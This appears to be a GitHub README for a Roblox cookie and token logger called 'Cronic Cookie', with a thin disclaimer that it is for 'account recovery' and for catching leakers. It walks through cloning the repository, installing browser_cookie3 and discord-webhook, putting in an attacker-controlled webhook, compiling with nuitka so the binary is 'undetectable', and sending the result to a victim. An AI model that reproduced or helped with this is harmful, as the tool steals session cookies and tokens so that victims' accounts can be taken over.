This is not to be used for any malicuis intent, I made this purely for a program that detects if you are using an unlicensed version.
Smooth and quick cookie logger for account recovery.
View Demo
·
Report Bug
·
Request Feature
Welcome to the newest release of Cronic Cookie, a speedy cookie logger. This is my main project and I am working more and more on it. This will probably become an anti skid which steals the cookie and token of a person that downloaded a leaked copy or leaked it.
To get a local copy up and running follow these simple steps.
This is an example of how to list things you need to use the software and how to install them.
- Go to the folder with all of the files.
- In the navigation bar (C:/User/Desktop/Roblox-Cookie-Logger) delete everything and type cmd, this will bring up "the shell".
- Now install the packages as instructed.
- Download the .zip of this repository
git clone https://github.com/DaEpicSwag/Roblox-Cookie-Logger.git
- Install PIP packages
pip install nuitka pip install requests pip install browser_cookie3 pip install discord-webhook
-
Replace your webhook. If you are using the advanced logger, make sure to fill in the webhook for the token logger and the cookie logger which are in diffrent locations.
-
Compile to exe using nuitka PLEASE AND NOT PYINSTALLER. Why?
1. Harder to crack because Pyinstaller just unloads the source into the temp directory
2. Undetectable
3. Faster
4. Smaller file size that works well when compressed.
- Nuitka How To
1. Access the "Shell"
2. python -m nuitka urfile.py
- Send it over.
See the open issues for a list of proposed features (and known issues).
Contributions are what make the open source community such an amazing place to be learn, inspire, and create. Any contributions you make are greatly appreciated.
- Fork the Project
- Create your Feature Branch (
git checkout -b feature/AmazingFeature
) - Commit your Changes (
git commit -m 'Add some AmazingFeature'
) - Push to the Branch (
git push origin feature/AmazingFeature
) - Open a Pull Request
Distributed under the MIT License. See LICENSE
for more information.
Discord - @SonicTheHedHog#0001
Project Link: Roblox-Cookie-Logger
- PogScriptR Thanks for the request webhook explaination